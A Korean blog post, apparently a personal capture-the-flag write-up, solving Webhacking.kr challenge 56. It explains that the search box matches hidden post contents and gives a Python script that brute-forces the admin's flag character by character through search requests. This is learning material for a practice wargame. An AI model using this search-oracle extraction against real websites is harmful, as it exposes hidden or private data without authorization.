ursobad
ursobad
ursobad
전체 방문자
오늘
어제
  • 분류 전체보기 (116)
    • Emotion (35)
      • 파이썬 (10)
      • 문제 (10)
      • 인공지능 기초 (15)
    • Best of the Best (3)
    • Hacking (58)
      • HackCTF (12)
      • DreamHACK (7)
      • Webhacking.kr (19)
      • Root Me (6)
      • HTB (5)
      • 기타 (7)
      • 리버싱 소수전공 (2)
    • 기능반 (16)
      • 2과제 (14)
      • 3과제 (2)
    • 기록 (3)
    • 짧은 글들 (0)
    • 기타 (1)
    • Zombie (0)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 머신러닝
  • BoB 자소서
  • KNN
  • Python
  • BoB 면접
  • BoB 자기소개서
  • 함수
  • 구독자 전용 다시보기
  • 얼굴검출
  • 의사결정트리
  • Bob
  • BoB 질문
  • BoB 필기
  • 앙상블
  • 123
  • 백준
  • BoB 자기소개
  • OpenCV
  • 파이썬
  • BoB 11기

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
ursobad
Hacking/Webhacking.kr

Webhacking.kr - 56

Webhacking.kr - 56
Hacking/Webhacking.kr

Webhacking.kr - 56

2021. 6. 1. 20:30

admin readme
guest hi~

일단 아무거나 막 검색해보다가 ~을 검색했는데

이게 검색되서 subject가 필터링 되나 했는데 hi를 검색하니

admin이 검색되서 내용 필터링인걸 알게 되었다.

그래서 파이썬으로 값을 계속 넣어서 admin이라는 값이 나오는 문자열만 모으면 될것 같다.

import requests
url = "https://webhacking.kr/challenge/web-33/index.php"
cookie = {'PHPSESSID':'itbee38p8aae7p17kvchcr644b'}

#a = requests.get(url, cookies=cookie)
flag= 'FLAG{'
for i in range(1000):
    for j in range(32, 128):
        if chr(j)=='%':
            continue
        search={'search':flag+chr(j)}

        a = requests.post(url, data=search, cookies=cookie)
        if 'admin' in a.text:
            flag+=chr(j)
            print(flag)
            break

 

여기서 10분째 제자리길래 와일드 문자때문인것같아서 _을 }로 바꿔서 flag를 인증하니까 성공했다

저작자표시 (새창열림)

'Hacking > Webhacking.kr' 카테고리의 다른 글

Webhacking.kr - 34  (0) 2021.06.01
Webhacking.kr - 4  (0) 2021.06.01
webhacking.kr - 61  (0) 2021.05.28
Webhacking.kr - 59  (0) 2021.05.28
Webhacking.kr - 42  (0) 2021.05.28
    'Hacking/Webhacking.kr' 카테고리의 다른 글
    • Webhacking.kr - 34
    • Webhacking.kr - 4
    • webhacking.kr - 61
    • Webhacking.kr - 59
    ursobad
    ursobad

    티스토리툴바

    단축키

    내 블로그

    내 블로그 - 관리자 홈 전환
    Q
    Q
    새 글 쓰기
    W
    W

    블로그 게시글

    글 수정 (권한 있는 경우)
    E
    E
    댓글 영역으로 이동
    C
    C

    모든 영역

    이 페이지의 URL 복사
    S
    S
    맨 위로 이동
    T
    T
    티스토리 홈 이동
    H
    H
    단축키 안내
    Shift + /
    ⇧ + /

    * 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.